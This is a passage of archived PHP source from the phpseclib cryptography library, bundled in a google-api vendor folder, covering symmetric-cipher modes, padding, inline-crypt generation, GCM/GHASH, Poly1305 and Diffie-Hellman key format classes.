self::ENGINE_MCRYPT: $this->enchanged = $this->dechanged = true; set_error_handler(function () { }); if (!isset($this->enmcrypt)) { static $mcrypt_modes = [ self::MODE_CTR => 'ctr', self::MODE_ECB => MCRYPT_MODE_ECB, self::MODE_CBC => MCRYPT_MODE_CBC, self::MODE_CFB => 'ncfb', self::MODE_CFB8 => MCRYPT_MODE_CFB, self::MODE_OFB => MCRYPT_MODE_NOFB, self::MODE_OFB8 => MCRYPT_MODE_OFB, self::MODE_STREAM => MCRYPT_MODE_STREAM, ]; $this->demcrypt = mcrypt_module_open($this->cipher_name_mcrypt, '', $mcrypt_modes[$this->mode], ''); $this->enmcrypt = mcrypt_module_open($this->cipher_name_mcrypt, '', $mcrypt_modes[$this->mode], ''); // we need the $ecb mcrypt resource (only) in MODE_CFB with enableContinuousBuffer() // to workaround mcrypt's broken ncfb implementation in buffered mode // see: {@link http://phpseclib.sourceforge.net/cfb-demo.phps} if ($this->mode == self::MODE_CFB) { $this->ecb = mcrypt_module_open($this->cipher_name_mcrypt, '', MCRYPT_MODE_ECB, ''); } } // else should mcrypt_generic_deinit be called? if ($this->mode == self::MODE_CFB) { mcrypt_generic_init($this->ecb, $this->key, str_repeat("\0", $this->block_size)); } restore_error_handler(); break; case self::ENGINE_INTERNAL: $this->setupKey(); break; case self::ENGINE_EVAL: if ($this->nonIVChanged) { $this->setupKey(); $this->setupInlineCrypt(); } } $this->nonIVChanged = false; } /** * Pads a string * * Pads a string using the RSA PKCS padding standards so that its length is a multiple of the blocksize. * $this->block_size - (strlen($text) % $this->block_size) bytes are added, each of which is equal to * chr($this->block_size - (strlen($text) % $this->block_size) * * If padding is disabled and $text is not a multiple of the blocksize, the string will be padded regardless * and padding will, hence forth, be enabled. * * @see self::unpad() * @param string $text * @throws \LengthException if padding is disabled and the plaintext's length is not a multiple of the block size * @return string */ protected function pad($text) { $length = strlen($text); if (!$this->padding) { if ($length % $this->block_size == 0) { return $text; } else { throw new \LengthException("The plaintext's length ($length) is not a multiple of the block size ({$this->block_size}). Try enabling padding."); } } $pad = $this->block_size - ($length % $this->block_size); return str_pad($text, $length + $pad, chr($pad)); } /** * Unpads a string. * * If padding is enabled and the reported padding length is invalid the encryption key will be assumed to be wrong * and false will be returned. * * @see self::pad() * @param string $text * @throws \LengthException if the ciphertext's length is not a multiple of the block size * @return string */ protected function unpad($text) { if (!$this->padding) { return $text; } $length = ord($text[strlen($text) - 1]); if (!$length || $length > $this->block_size) { throw new BadDecryptionException("The ciphertext has an invalid padding length ($length) compared to the block size ({$this->block_size})"); } return substr($text, 0, -$length); } /** * Setup the performance-optimized function for de/encrypt() * * Stores the created (or existing) callback function-name * in $this->inline_crypt * * Internally for phpseclib developers: * * _setupInlineCrypt() would be called only if: * * - $this->engine === self::ENGINE_EVAL * * - each time on _setup(), after(!) _setupKey() * * * This ensures that _setupInlineCrypt() has always a * full ready2go initializated internal cipher $engine state * where, for example, the keys already expanded, * keys/block_size calculated and such. * * It is, each time if called, the responsibility of _setupInlineCrypt(): * * - to set $this->inline_crypt to a valid and fully working callback function * as a (faster) replacement for encrypt() / decrypt() * * - NOT to create unlimited callback functions (for memory reasons!) * no matter how often _setupInlineCrypt() would be called. At some * point of amount they must be generic re-useable. * * - the code of _setupInlineCrypt() it self, * and the generated callback code, * must be, in following order: * - 100% safe * - 100% compatible to encrypt()/decrypt() * - using only php5+ features/lang-constructs/php-extensions if * compatibility (down to php4) or fallback is provided * - readable/maintainable/understandable/commented and... not-cryptic-styled-code :-) * - >= 10% faster than encrypt()/decrypt() [which is, by the way, * the reason for the existence of _setupInlineCrypt() :-)] * - memory-nice * - short (as good as possible) * * Note: - _setupInlineCrypt() is using _createInlineCryptFunction() to create the full callback function code. * - In case of using inline crypting, _setupInlineCrypt() must extend by the child \phpseclib3\Crypt\* class. * - The following variable names are reserved: * - $_* (all variable names prefixed with an underscore) * - $self (object reference to it self. Do not use $this, but $self instead) * - $in (the content of $in has to en/decrypt by the generated code) * - The callback function should not use the 'return' statement, but en/decrypt'ing the content of $in only * * {@internal If a Crypt_* class providing inline crypting it must extend _setupInlineCrypt()} * * @see self::setup() * @see self::createInlineCryptFunction() * @see self::encrypt() * @see self::decrypt() */ //protected function setupInlineCrypt(); /** * Creates the performance-optimized function for en/decrypt() * * Internally for phpseclib developers: * * _createInlineCryptFunction(): * * - merge the $cipher_code [setup'ed by _setupInlineCrypt()] * with the current [$this->]mode of operation code * * - create the $inline function, which called by encrypt() / decrypt() * as its replacement to speed up the en/decryption operations. * * - return the name of the created $inline callback function * * - used to speed up en/decryption * * * * The main reason why can speed up things [up to 50%] this way are: * * - using variables more effective then regular. * (ie no use of expensive arrays but integers $k_0, $k_1 ... * or even, for example, the pure $key[] values hardcoded) * * - avoiding 1000's of function calls of ie _encryptBlock() * but inlining the crypt operations. * in the mode of operation for() loop. * * - full loop unroll the (sometimes key-dependent) rounds * avoiding this way ++$i counters and runtime-if's etc... * * The basic code architectur of the generated $inline en/decrypt() * lambda function, in pseudo php, is: * * * +----------------------------------------------------------------------------------------------+ * | callback $inline = create_function: | * | lambda_function_0001_crypt_ECB($action, $text) | * | { | * | INSERT PHP CODE OF: | * | $cipher_code['init_crypt']; // general init code. | * | // ie: $sbox'es declarations used for | * | // encrypt and decrypt'ing. | * | | * | switch ($action) { | * | case 'encrypt': | * | INSERT PHP CODE OF: | * | $cipher_code['init_encrypt']; // encrypt sepcific init code. | * | ie: specified $key or $box | * | declarations for encrypt'ing. | * | | * | foreach ($ciphertext) { | * | $in = $block_size of $ciphertext; | * | | * | INSERT PHP CODE OF: | * | $cipher_code['encrypt_block']; // encrypt's (string) $in, which is always: | * | // strlen($in) == $this->block_size | * | // here comes the cipher algorithm in action | * | // for encryption. | * | // $cipher_code['encrypt_block'] has to | * | // encrypt the content of the $in variable | * | | * | $plaintext .= $in; | * | } | * | return $plaintext; | * | | * | case 'decrypt': | * | INSERT PHP CODE OF: | * | $cipher_code['init_decrypt']; // decrypt sepcific init code | * | ie: specified $key or $box | * | declarations for decrypt'ing. | * | foreach ($plaintext) { | * | $in = $block_size of $plaintext; | * | | * | INSERT PHP CODE OF: | * | $cipher_code['decrypt_block']; // decrypt's (string) $in, which is always | * | // strlen($in) == $this->block_size | * | // here comes the cipher algorithm in action | * | // for decryption. | * | // $cipher_code['decrypt_block'] has to | * | // decrypt the content of the $in variable | * | $ciphertext .= $in; | * | } | * | return $ciphertext; | * | } | * | } | * +----------------------------------------------------------------------------------------------+ * * * See also the \phpseclib3\Crypt\*::_setupInlineCrypt()'s for * productive inline $cipher_code's how they works. * * Structure of: * * $cipher_code = [ * 'init_crypt' => (string) '', // optional * 'init_encrypt' => (string) '', // optional * 'init_decrypt' => (string) '', // optional * 'encrypt_block' => (string) '', // required * 'decrypt_block' => (string) '' // required * ]; * * * @see self::setupInlineCrypt() * @see self::encrypt() * @see self::decrypt() * @param array $cipher_code * @return string (the name of the created callback function) */ protected function createInlineCryptFunction($cipher_code) { $block_size = $this->block_size; // optional $init_crypt = isset($cipher_code['init_crypt']) ? $cipher_code['init_crypt'] : ''; $init_encrypt = isset($cipher_code['init_encrypt']) ? $cipher_code['init_encrypt'] : ''; $init_decrypt = isset($cipher_code['init_decrypt']) ? $cipher_code['init_decrypt'] : ''; // required $encrypt_block = $cipher_code['encrypt_block']; $decrypt_block = $cipher_code['decrypt_block']; // Generating mode of operation inline code, // merged with the $cipher_code algorithm // for encrypt- and decryption. switch ($this->mode) { case self::MODE_ECB: $encrypt = $init_encrypt . ' $_ciphertext = ""; $_plaintext_len = strlen($_text); for ($_i = 0; $_i < $_plaintext_len; $_i+= ' . $block_size . ') { $in = substr($_text, $_i, ' . $block_size . '); ' . $encrypt_block . ' $_ciphertext.= $in; } return $_ciphertext; '; $decrypt = $init_decrypt . ' $_plaintext = ""; $_text = str_pad($_text, strlen($_text) + (' . $block_size . ' - strlen($_text) % ' . $block_size . ') % ' . $block_size . ', chr(0)); $_ciphertext_len = strlen($_text); for ($_i = 0; $_i < $_ciphertext_len; $_i+= ' . $block_size . ') { $in = substr($_text, $_i, ' . $block_size . '); ' . $decrypt_block . ' $_plaintext.= $in; } return $this->unpad($_plaintext); '; break; case self::MODE_CTR: $encrypt = $init_encrypt . ' $_ciphertext = ""; $_plaintext_len = strlen($_text); $_xor = $this->encryptIV; $_buffer = &$this->enbuffer; if (strlen($_buffer["ciphertext"])) { for ($_i = 0; $_i < $_plaintext_len; $_i+= ' . $block_size . ') { $_block = substr($_text, $_i, ' . $block_size . '); if (strlen($_block) > strlen($_buffer["ciphertext"])) { $in = $_xor; ' . $encrypt_block . ' \phpseclib3\Common\Functions\Strings::increment_str($_xor); $_buffer["ciphertext"].= $in; } $_key = \phpseclib3\Common\Functions\Strings::shift($_buffer["ciphertext"], ' . $block_size . '); $_ciphertext.= $_block ^ $_key; } } else { for ($_i = 0; $_i < $_plaintext_len; $_i+= ' . $block_size . ') { $_block = substr($_text, $_i, ' . $block_size . '); $in = $_xor; ' . $encrypt_block . ' \phpseclib3\Common\Functions\Strings::increment_str($_xor); $_key = $in; $_ciphertext.= $_block ^ $_key; } } if ($this->continuousBuffer) { $this->encryptIV = $_xor; if ($_start = $_plaintext_len % ' . $block_size . ') { $_buffer["ciphertext"] = substr($_key, $_start) . $_buffer["ciphertext"]; } } return $_ciphertext; '; $decrypt = $init_encrypt . ' $_plaintext = ""; $_ciphertext_len = strlen($_text); $_xor = $this->decryptIV; $_buffer = &$this->debuffer; if (strlen($_buffer["ciphertext"])) { for ($_i = 0; $_i < $_ciphertext_len; $_i+= ' . $block_size . ') { $_block = substr($_text, $_i, ' . $block_size . '); if (strlen($_block) > strlen($_buffer["ciphertext"])) { $in = $_xor; ' . $encrypt_block . ' \phpseclib3\Common\Functions\Strings::increment_str($_xor); $_buffer["ciphertext"].= $in; } $_key = \phpseclib3\Common\Functions\Strings::shift($_buffer["ciphertext"], ' . $block_size . '); $_plaintext.= $_block ^ $_key; } } else { for ($_i = 0; $_i < $_ciphertext_len; $_i+= ' . $block_size . ') { $_block = substr($_text, $_i, ' . $block_size . '); $in = $_xor; ' . $encrypt_block . ' \phpseclib3\Common\Functions\Strings::increment_str($_xor); $_key = $in; $_plaintext.= $_block ^ $_key; } } if ($this->continuousBuffer) { $this->decryptIV = $_xor; if ($_start = $_ciphertext_len % ' . $block_size . ') { $_buffer["ciphertext"] = substr($_key, $_start) . $_buffer["ciphertext"]; } } return $_plaintext; '; break; case self::MODE_CFB: $encrypt = $init_encrypt . ' $_ciphertext = ""; $_buffer = &$this->enbuffer; if ($this->continuousBuffer) { $_iv = &$this->encryptIV; $_pos = &$_buffer["pos"]; } else { $_iv = $this->encryptIV; $_pos = 0; } $_len = strlen($_text); $_i = 0; if ($_pos) { $_orig_pos = $_pos; $_max = ' . $block_size . ' - $_pos; if ($_len >= $_max) { $_i = $_max; $_len-= $_max; $_pos = 0; } else { $_i = $_len; $_pos+= $_len; $_len = 0; } $_ciphertext = substr($_iv, $_orig_pos) ^ $_text; $_iv = substr_replace($_iv, $_ciphertext, $_orig_pos, $_i); } while ($_len >= ' . $block_size . ') { $in = $_iv; ' . $encrypt_block . '; $_iv = $in ^ substr($_text, $_i, ' . $block_size . '); $_ciphertext.= $_iv; $_len-= ' . $block_size . '; $_i+= ' . $block_size . '; } if ($_len) { $in = $_iv; ' . $encrypt_block . ' $_iv = $in; $_block = $_iv ^ substr($_text, $_i); $_iv = substr_replace($_iv, $_block, 0, $_len); $_ciphertext.= $_block; $_pos = $_len; } return $_ciphertext; '; $decrypt = $init_encrypt . ' $_plaintext = ""; $_buffer = &$this->debuffer; if ($this->continuousBuffer) { $_iv = &$this->decryptIV; $_pos = &$_buffer["pos"]; } else { $_iv = $this->decryptIV; $_pos = 0; } $_len = strlen($_text); $_i = 0; if ($_pos) { $_orig_pos = $_pos; $_max = ' . $block_size . ' - $_pos; if ($_len >= $_max) { $_i = $_max; $_len-= $_max; $_pos = 0; } else { $_i = $_len; $_pos+= $_len; $_len = 0; } $_plaintext = substr($_iv, $_orig_pos) ^ $_text; $_iv = substr_replace($_iv, substr($_text, 0, $_i), $_orig_pos, $_i); } while ($_len >= ' . $block_size . ') { $in = $_iv; ' . $encrypt_block . ' $_iv = $in; $cb = substr($_text, $_i, ' . $block_size . '); $_plaintext.= $_iv ^ $cb; $_iv = $cb; $_len-= ' . $block_size . '; $_i+= ' . $block_size . '; } if ($_len) { $in = $_iv; ' . $encrypt_block . ' $_iv = $in; $_plaintext.= $_iv ^ substr($_text, $_i); $_iv = substr_replace($_iv, substr($_text, $_i), 0, $_len); $_pos = $_len; } return $_plaintext; '; break; case self::MODE_CFB8: $encrypt = $init_encrypt . ' $_ciphertext = ""; $_len = strlen($_text); $_iv = $this->encryptIV; for ($_i = 0; $_i < $_len; ++$_i) { $in = $_iv; ' . $encrypt_block . ' $_ciphertext .= ($_c = $_text[$_i] ^ $in); $_iv = substr($_iv, 1) . $_c; } if ($this->continuousBuffer) { if ($_len >= ' . $block_size . ') { $this->encryptIV = substr($_ciphertext, -' . $block_size . '); } else { $this->encryptIV = substr($this->encryptIV, $_len - ' . $block_size . ') . substr($_ciphertext, -$_len); } } return $_ciphertext; '; $decrypt = $init_encrypt . ' $_plaintext = ""; $_len = strlen($_text); $_iv = $this->decryptIV; for ($_i = 0; $_i < $_len; ++$_i) { $in = $_iv; ' . $encrypt_block . ' $_plaintext .= $_text[$_i] ^ $in; $_iv = substr($_iv, 1) . $_text[$_i]; } if ($this->continuousBuffer) { if ($_len >= ' . $block_size . ') { $this->decryptIV = substr($_text, -' . $block_size . '); } else { $this->decryptIV = substr($this->decryptIV, $_len - ' . $block_size . ') . substr($_text, -$_len); } } return $_plaintext; '; break; case self::MODE_OFB8: $encrypt = $init_encrypt . ' $_ciphertext = ""; $_len = strlen($_text); $_iv = $this->encryptIV; for ($_i = 0; $_i < $_len; ++$_i) { $in = $_iv; ' . $encrypt_block . ' $_ciphertext.= $_text[$_i] ^ $in; $_iv = substr($_iv, 1) . $in[0]; } if ($this->continuousBuffer) { $this->encryptIV = $_iv; } return $_ciphertext; '; $decrypt = $init_encrypt . ' $_plaintext = ""; $_len = strlen($_text); $_iv = $this->decryptIV; for ($_i = 0; $_i < $_len; ++$_i) { $in = $_iv; ' . $encrypt_block . ' $_plaintext.= $_text[$_i] ^ $in; $_iv = substr($_iv, 1) . $in[0]; } if ($this->continuousBuffer) { $this->decryptIV = $_iv; } return $_plaintext; '; break; case self::MODE_OFB: $encrypt = $init_encrypt . ' $_ciphertext = ""; $_plaintext_len = strlen($_text); $_xor = $this->encryptIV; $_buffer = &$this->enbuffer; if (strlen($_buffer["xor"])) { for ($_i = 0; $_i < $_plaintext_len; $_i+= ' . $block_size . ') { $_block = substr($_text, $_i, ' . $block_size . '); if (strlen($_block) > strlen($_buffer["xor"])) { $in = $_xor; ' . $encrypt_block . ' $_xor = $in; $_buffer["xor"].= $_xor; } $_key = \phpseclib3\Common\Functions\Strings::shift($_buffer["xor"], ' . $block_size . '); $_ciphertext.= $_block ^ $_key; } } else { for ($_i = 0; $_i < $_plaintext_len; $_i+= ' . $block_size . ') { $in = $_xor; ' . $encrypt_block . ' $_xor = $in; $_ciphertext.= substr($_text, $_i, ' . $block_size . ') ^ $_xor; } $_key = $_xor; } if ($this->continuousBuffer) { $this->encryptIV = $_xor; if ($_start = $_plaintext_len % ' . $block_size . ') { $_buffer["xor"] = substr($_key, $_start) . $_buffer["xor"]; } } return $_ciphertext; '; $decrypt = $init_encrypt . ' $_plaintext = ""; $_ciphertext_len = strlen($_text); $_xor = $this->decryptIV; $_buffer = &$this->debuffer; if (strlen($_buffer["xor"])) { for ($_i = 0; $_i < $_ciphertext_len; $_i+= ' . $block_size . ') { $_block = substr($_text, $_i, ' . $block_size . '); if (strlen($_block) > strlen($_buffer["xor"])) { $in = $_xor; ' . $encrypt_block . ' $_xor = $in; $_buffer["xor"].= $_xor; } $_key = \phpseclib3\Common\Functions\Strings::shift($_buffer["xor"], ' . $block_size . '); $_plaintext.= $_block ^ $_key; } } else { for ($_i = 0; $_i < $_ciphertext_len; $_i+= ' . $block_size . ') { $in = $_xor; ' . $encrypt_block . ' $_xor = $in; $_plaintext.= substr($_text, $_i, ' . $block_size . ') ^ $_xor; } $_key = $_xor; } if ($this->continuousBuffer) { $this->decryptIV = $_xor; if ($_start = $_ciphertext_len % ' . $block_size . ') { $_buffer["xor"] = substr($_key, $_start) . $_buffer["xor"]; } } return $_plaintext; '; break; case self::MODE_STREAM: $encrypt = $init_encrypt . ' $_ciphertext = ""; ' . $encrypt_block . ' return $_ciphertext; '; $decrypt = $init_decrypt . ' $_plaintext = ""; ' . $decrypt_block . ' return $_plaintext; '; break; // case self::MODE_CBC: default: $encrypt = $init_encrypt . ' $_ciphertext = ""; $_plaintext_len = strlen($_text); $in = $this->encryptIV; for ($_i = 0; $_i < $_plaintext_len; $_i+= ' . $block_size . ') { $in = substr($_text, $_i, ' . $block_size . ') ^ $in; ' . $encrypt_block . ' $_ciphertext.= $in; } if ($this->continuousBuffer) { $this->encryptIV = $in; } return $_ciphertext; '; $decrypt = $init_decrypt . ' $_plaintext = ""; $_text = str_pad($_text, strlen($_text) + (' . $block_size . ' - strlen($_text) % ' . $block_size . ') % ' . $block_size . ', chr(0)); $_ciphertext_len = strlen($_text); $_iv = $this->decryptIV; for ($_i = 0; $_i < $_ciphertext_len; $_i+= ' . $block_size . ') { $in = $_block = substr($_text, $_i, ' . $block_size . '); ' . $decrypt_block . ' $_plaintext.= $in ^ $_iv; $_iv = $_block; } if ($this->continuousBuffer) { $this->decryptIV = $_iv; } return $this->unpad($_plaintext); '; break; } // Before discrediting this, please read the following: // @see https://github.com/phpseclib/phpseclib/issues/1293 // @see https://github.com/phpseclib/phpseclib/pull/1143 eval('$func = function ($_action, $_text) { ' . $init_crypt . 'if ($_action == "encrypt") { ' . $encrypt . ' } else { ' . $decrypt . ' }};'); return \Closure::bind($func, $this, static::class); } /** * Convert float to int * * On ARM CPUs converting floats to ints doesn't always work * * @param string $x * @return int */ protected static function safe_intval($x) { if (is_int($x)) { return $x; } if (self::$use_reg_intval) { return PHP_INT_SIZE == 4 && PHP_VERSION_ID >= 80100 ? intval($x) : $x; } return (fmod($x, 0x80000000) & 0x7FFFFFFF) | ((fmod(floor($x / 0x80000000), 2) & 1) << 31); } /** * eval()'able string for in-line float to int * * @return string */ protected static function safe_intval_inline() { if (self::$use_reg_intval) { return PHP_INT_SIZE == 4 && PHP_VERSION_ID >= 80100 ? 'intval(%s)' : '%s'; } $safeint = '(is_int($temp = %s) ? $temp : (fmod($temp, 0x80000000) & 0x7FFFFFFF) | '; return $safeint . '((fmod(floor($temp / 0x80000000), 2) & 1) << 31))'; } /** * Sets up GCM parameters * * See steps 1-2 of https://nvlpubs.nist.gov/nistpubs/Legacy/SP/nistspecialpublication800-38d.pdf#page=23 * for more info * */ private function setupGCM() { // don't keep on re-calculating $this->h if (!$this->h || $this->hKey != $this->key) { $cipher = new static('ecb'); $cipher->setKey($this->key); $cipher->disablePadding(); $this->h = self::$gcmField->newInteger( Strings::switchEndianness($cipher->encrypt("\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0")) ); $this->hKey = $this->key; } if (strlen($this->nonce) == 12) { $this->iv = $this->nonce . "\0\0\0\1"; } else { $this->iv = $this->ghash( self::nullPad128($this->nonce) . str_repeat("\0", 8) . self::len64($this->nonce) ); } } /** * Performs GHASH operation * * See https://nvlpubs.nist.gov/nistpubs/Legacy/SP/nistspecialpublication800-38d.pdf#page=20 * for more info * * @see self::decrypt() * @see self::encrypt() * @param string $x * @return string */ private function ghash($x) { $h = $this->h; $y = ["\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0"]; $x = str_split($x, 16); $n = 0; // the switchEndianness calls are necessary because the multiplication algorithm in BinaryField/Integer // interprets strings as polynomials in big endian order whereas in GCM they're interpreted in little // endian order per https://nvlpubs.nist.gov/nistpubs/Legacy/SP/nistspecialpublication800-38d.pdf#page=19. // big endian order is what binary field elliptic curves use per http://www.secg.org/sec1-v2.pdf#page=18. // we could switchEndianness here instead of in the while loop but doing so in the while loop seems like it // might be slightly more performant //$x = Strings::switchEndianness($x); foreach ($x as $xn) { $xn = Strings::switchEndianness($xn); $t = $y[$n] ^ $xn; $temp = self::$gcmField->newInteger($t); $y[++$n] = $temp->multiply($h)->toBytes(); $y[$n] = substr($y[$n], 1); } $y[$n] = Strings::switchEndianness($y[$n]); return $y[$n]; } /** * Returns the bit length of a string in a packed format * * @see self::decrypt() * @see self::encrypt() * @see self::setupGCM() * @param string $str * @return string */ private static function len64($str) { return "\0\0\0\0" . pack('N', 8 * strlen($str)); } /** * NULL pads a string to be a multiple of 128 * * @see self::decrypt() * @see self::encrypt() * @see self::setupGCM() * @param string $str * @return string */ protected static function nullPad128($str) { $len = strlen($str); return $str . str_repeat("\0", 16 * ceil($len / 16) - $len); } /** * Calculates Poly1305 MAC * * On my system ChaCha20, with libsodium, takes 0.5s. With this custom Poly1305 implementation * it takes 1.2s. * * @see self::decrypt() * @see self::encrypt() * @param string $text * @return string */ protected function poly1305($text) { $s = $this->poly1305Key; // strlen($this->poly1305Key) == 32 $r = Strings::shift($s, 16); $r = strrev($r); $r &= "\x0f\xff\xff\xfc\x0f\xff\xff\xfc\x0f\xff\xff\xfc\x0f\xff\xff\xff"; $s = strrev($s); $r = self::$poly1305Field->newInteger(new BigInteger($r, 256)); $s = self::$poly1305Field->newInteger(new BigInteger($s, 256)); $a = self::$poly1305Field->newInteger(new BigInteger()); $blocks = str_split($text, 16); foreach ($blocks as $block) { $n = strrev($block . chr(1)); $n = self::$poly1305Field->newInteger(new BigInteger($n, 256)); $a = $a->add($n); $a = $a->multiply($r); } $r = $a->toBigInteger()->add($s->toBigInteger()); $mask = "\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"; return strrev($r->toBytes()) & $mask; } /** * Return the mode * * You can do $obj instanceof AES or whatever to get the cipher but you can't do that to get the mode * * @return string */ public function getMode() { return array_flip(self::MODE_MAP)[$this->mode]; } /** * Is the continuous buffer enabled? * * @return boolean */ public function continuousBufferEnabled() { return $this->continuousBuffer; } } google-api/vendor/phpseclib/phpseclib/phpseclib/Crypt/Common/PublicKey.php000064400000001116147600400120022701 0ustar00 * @copyright 2009 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace phpseclib3\Crypt\Common; /** * PublicKey interface * * @author Jim Wigginton */ interface PublicKey { public function verify($message, $signature); //public function encrypt($plaintext); public function toString($type, array $options = []); public function getFingerprint($algorithm); } google-api/vendor/phpseclib/phpseclib/phpseclib/Crypt/Common/StreamCipher.php000064400000002203147600400120023376 0ustar00 * @author Hans-Juergen Petrich * @copyright 2007 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace phpseclib3\Crypt\Common; /** * Base Class for all stream cipher classes * * @author Jim Wigginton */ abstract class StreamCipher extends SymmetricKey { /** * Block Length of the cipher * * Stream ciphers do not have a block size * * @see \phpseclib3\Crypt\Common\SymmetricKey::block_size * @var int */ protected $block_size = 0; /** * Default Constructor. * * @see \phpseclib3\Crypt\Common\SymmetricKey::__construct() * @return \phpseclib3\Crypt\Common\StreamCipher */ public function __construct() { parent::__construct('stream'); } /** * Stream ciphers not use an IV * * @return bool */ public function usesIV() { return false; } } google-api/vendor/phpseclib/phpseclib/phpseclib/Crypt/DH/Formats/Keys/PKCS1.php000064400000004074147600400120023232 0ustar00 * @copyright 2015 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace phpseclib3\Crypt\DH\Formats\Keys; use phpseclib3\Crypt\Common\Formats\Keys\PKCS1 as Progenitor; use phpseclib3\File\ASN1; use phpseclib3\File\ASN1\Maps; use phpseclib3\Math\BigInteger; /** * "PKCS1" Formatted DH Key Handler * * @author Jim Wigginton */ abstract class PKCS1 extends Progenitor { /** * Break a public or private key down into its constituent components * * @param string $key * @param string $password optional * @return array */ public static function load($key, $password = '') { $key = parent::load($key, $password); $decoded = ASN1::decodeBER($key); if (!$decoded) { throw new \RuntimeException('Unable to decode BER'); } $components = ASN1::asn1map($decoded[0], Maps\DHParameter::MAP); if (!is_array($components)) { throw new \RuntimeException('Unable to perform ASN1 mapping on parameters'); } return $components; } /** * Convert EC parameters to the appropriate format * * @return string */ public static function saveParameters(BigInteger $prime, BigInteger $base, array $options = []) { $params = [ 'prime' => $prime, 'base' => $base ]; $params = ASN1::encodeDER($params, Maps\DHParameter::MAP); return "-----BEGIN DH PARAMETERS-----\r\n" . chunk_split(base64_encode($params), 64) . "-----END DH PARAMETERS-----\r\n"; } } google-api/vendor/phpseclib/phpseclib/phpseclib/Crypt/DH/Formats/Keys/PKCS8.php000064400000007552147600400120023245 0ustar00 * @copyright 2015 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace phpseclib3\Crypt\DH\Formats\Keys; use phpseclib3\Crypt\Common\Formats\Keys\PKCS8 as Progenitor; use phpseclib3\File\ASN1; use phpseclib3\File\ASN1\Maps; use phpseclib3\Math\BigInteger; /** * PKCS#8 Formatted DH Key Handler * * @author Jim Wigginton */ abstract class PKCS8 extends Progenitor { /** * OID Name * * @var string */ const OID_NAME = 'dhKeyAgreement'; /** * OID Value * * @var string */ const OID_VALUE = '1.2.840.113549.1.3.1'; /** * Child OIDs loaded * * @var bool */ protected static $childOIDsLoaded = false; /** * Break a public or private key down into its constituent components * * @param string $key * @param string $password optional * @return array */ public static function load($key, $password = '') { $key = parent::load($key, $password); $type = isset($key['privateKey']) ? 'privateKey' : 'publicKey'; $decoded = ASN1::decodeBER($key[$type . 'Algorithm']['parameters']->element); if (empty($decoded)) { throw new \RuntimeException('Unable to decode BER of parameters'); } $components = ASN1::asn1map($decoded[0], Maps\DHParameter::MAP); if (!is_array($components)) { throw new \RuntimeException('Unable to perform ASN1 mapping on parameters'); } $decoded = ASN1::decodeBER($key[$type]); switch (true) { case !isset($decoded): case !isset($decoded[0]['content']): case !$decoded[0]['content'] instanceof BigInteger: throw new \RuntimeException('Unable to decode BER of parameters'); } $components[$type] = $decoded[0]['content']; return $components; } /** * Convert a private key to the appropriate format. * * @param \phpseclib3\Math\BigInteger $prime * @param \phpseclib3\Math\BigInteger $base * @param \phpseclib3\Math\BigInteger $privateKey * @param \phpseclib3\Math\BigInteger $publicKey * @param string $password optional * @param array $options optional * @return string */ public static function savePrivateKey(BigInteger $prime, BigInteger $base, BigInteger $privateKey, BigInteger $publicKey, $password = '', array $options = []) { $params = [ 'prime' => $prime, 'base' => $base ]; $params = ASN1::encodeDER($params, Maps\DHParameter::MAP); $params = new ASN1\Element($params); $key = ASN1::encodeDER($privateKey, ['type' => ASN1::TYPE_INTEGER]); return self::wrapPrivateKey($key, [], $params, $password, null, '', $options); } /** * Convert a public key to the appropriate format * * @param \phpseclib3\Math\BigInteger $prime * @param \phpseclib3\Math\BigInteger $base * @param \phpseclib3\Math\BigInteger $publicKey * @param array $options optional * @return string */ public static function savePublicKey(BigInteger $prime, BigInteger $base, BigInteger $publicKey, array $options = []) { $params = [ 'prime' => $prime, 'base' => $base ]; $params = ASN1::encodeDER($params, Maps\DHParameter::MAP); $params = new ASN1\Element($params); $key = ASN1::encodeDER($publicKey, ['type' => ASN1::TYPE_INTEGER]); return self::wrapPublicKey($key, $params); } } google-api/vendor/phpseclib/phpseclib/phpseclib/Crypt/DH/PrivateKey.php000064400000003270147600400120022143 0ustar00 * @copyright 2015 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace phpseclib3\Crypt\DH; use phpseclib3\Crypt\Common; use phpseclib3\Crypt\DH; /** * DH Private Key * * @author Jim Wigginton */ final class PrivateKey extends DH { use Common\Traits\PasswordProtected; /** * Private Key * * @var \phpseclib3\Math\BigInteger */ protected $privateKey; /** * Public Key * * @var \phpseclib3\Math\BigInteger */ protected $publicKey; /** * Returns the public key * * @return DH\PublicKey */ public function getPublicKey() { $type = self::validatePlugin('Keys', 'PKCS8', 'savePublicKey'); if (!isset($this->publicKey)) { $this->publicKey = $this->base->powMod($this->privateKey, $this->prime); } $key = $type::savePublicKey($this->prime, $this->base, $this->publicKey); return DH::loadFormat('PKCS8', $key); } /** * Returns the private key * * @param string $type * @param array $options optional * @return string */ public function toString($type, array $options = []) { $type = self::validatePlugin('Keys', $type, 'savePrivateKey'); if (!isset($this->publicKey)) { $this->publicKey = $this->base->powMod($this->privateKey, $this->prime); } return $type::savePrivateKey($this->prime, $this->base, $this->privateKey, $this->publicKey, $this->password, $options); } } google-api/vendor/phpseclib/phpseclib/phpseclib/Crypt/DH/Parameters.php000064400000001417147600400120022164 0ustar00 * @copyright 2015 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace phpseclib3\Crypt\DH; use phpseclib3\Crypt\DH; /** * DH Parameters * * @author Jim Wigginton */ final class Parameters extends DH { /** * Returns the parameters * * @param string $type * @param array $options optional * @return string */ public function toString($type = 'PKCS1', array $options = []) { $type = self::validatePlugin('Keys', 'PKCS1', 'saveParameters'); return $type::saveParameters($this->prime, $this->base, $options); } } google-api/vendor/phpseclib/phpseclib/phpseclib/Crypt/DH/PublicKey.php000064400000002024147600400120021743 0ustar00 * @copyright 2015 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net 